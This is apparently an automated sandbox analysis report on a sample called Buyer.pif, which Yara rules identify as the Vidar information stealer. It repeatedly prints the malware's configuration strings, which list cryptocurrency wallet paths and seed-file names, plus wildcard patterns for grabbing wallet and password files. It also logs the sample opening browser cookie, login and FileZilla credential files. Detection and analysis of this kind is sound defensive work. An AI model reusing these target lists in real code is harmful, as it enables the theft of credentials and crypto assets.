                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Buyer.pif, 0000000B.00000002.2536265595.0000000001060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: Buyer.pifBinary or memory string: WIN_81
                    Source: Buyer.pifBinary or memory string: WIN_XP
                    Source: Buyer.pifBinary or memory string: WIN_XPe
                    Source: Buyer.pifBinary or memory string: WIN_VISTA
                    Source: Geographic.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                    Source: Buyer.pifBinary or memory string: WIN_7
                    Source: Buyer.pifBinary or memory string: WIN_8
                    Source: Yara matchFile source: Process Memory Space: Buyer.pif PID: 2380, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Vidar
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: 11.2.Buyer.pif.1354718.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Buyer.pif.1354718.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Buyer.pif.40f0000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Buyer.pif PID: 2380, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FC198B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,11_2_00FC198B
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pifCode function: 11_2_00FC1F8D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00FC1F8D

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		11
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
